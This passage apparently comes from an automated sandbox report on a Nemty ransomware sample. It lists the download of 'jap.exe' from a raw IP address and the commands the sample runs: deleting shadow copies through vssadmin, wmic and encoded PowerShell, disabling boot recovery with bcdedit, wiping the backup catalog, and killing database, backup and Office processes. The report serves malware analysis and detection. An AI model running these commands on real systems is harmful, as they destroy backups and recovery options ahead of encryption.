SeIncreaseQuotaPrivilege 4752 WMIC.exe Token: SeSecurityPrivilege 4752 WMIC.exe Token: SeTakeOwnershipPrivilege 4752 WMIC.exe Token: SeLoadDriverPrivilege 4752 WMIC.exe Token: SeSystemProfilePrivilege 4752 WMIC.exe Token: SeSystemtimePrivilege 4752 WMIC.exe Token: SeProfSingleProcessPrivilege 4752 WMIC.exe Token: SeIncBasePriorityPrivilege 4752 WMIC.exe Token: SeCreatePagefilePrivilege 4752 WMIC.exe Token: SeBackupPrivilege 4752 WMIC.exe Token: SeRestorePrivilege 4752 WMIC.exe Token: SeShutdownPrivilege 4752 WMIC.exe Token: SeDebugPrivilege 4752 WMIC.exe Token: SeSystemEnvironmentPrivilege 4752 WMIC.exe Token: SeRemoteShutdownPrivilege 4752 WMIC.exe Token: SeUndockPrivilege 4752 WMIC.exe Token: SeManageVolumePrivilege 4752 WMIC.exe Token: 33 4752 WMIC.exe Token: 34 4752 WMIC.exe Token: 35 4752 WMIC.exe Token: 36 4752 WMIC.exe Token: SeDebugPrivilege 3464 taskkill.exe Token: SeDebugPrivilege 1292 taskkill.exe Token: SeDebugPrivilege 4616 taskkill.exe Token: SeDebugPrivilege 2900 taskkill.exe Token: SeDebugPrivilege 448 taskkill.exe Token: SeDebugPrivilege 660 taskkill.exe Token: SeDebugPrivilege 836 taskkill.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 944 taskkill.exe Token: SeDebugPrivilege 1156 taskkill.exe Token: SeDebugPrivilege 1348 taskkill.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 1588 taskkill.exe Token: SeRestorePrivilege 3752 WerFault.exe Token: SeBackupPrivilege 3752 WerFault.exe Token: SeDebugPrivilege 2508 taskmgr.exe Token: SeSystemProfilePrivilege 2508 taskmgr.exe Token: SeCreateGlobalPrivilege 2508 taskmgr.exe -
Suspicious use of SendNotifyMessage 96 IoCs
Processes:
taskmgr.exepid process 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe -
Runs net.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://92.63.197.190/jap.exe1⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5096 CREDAT:82945 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5096 CREDAT:340998 /prefetch:22⤵
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener5⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE5⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc5⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent5⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.44⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.45⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1005⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB5⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS5⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser5⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup115⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService115⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService5⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 6684⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt"3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt4⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe.64engns.partial
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\jap[1].exe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PLFRAX05.cookie
-
C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt
-
memory/3752-22-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-26-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-11-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-12-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-13-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-14-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-15-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-16-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-17-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-18-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-19-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-20-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-21-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-10-0x00000000055F0000-0x00000000055F1000-memory.dmpFilesize
4KB
-
memory/3752-23-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-24-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-25-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-9-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-27-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-28-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-29-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-30-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-31-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-32-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-33-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-34-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-35-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-36-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-37-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-38-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-39-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-40-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-4-0x0000000005500000-0x0000000005501000-memory.dmpFilesize
4KB
-
memory/3752-3-0x0000000004C30000-0x0000000004C31000-memory.dmpFilesize
4KB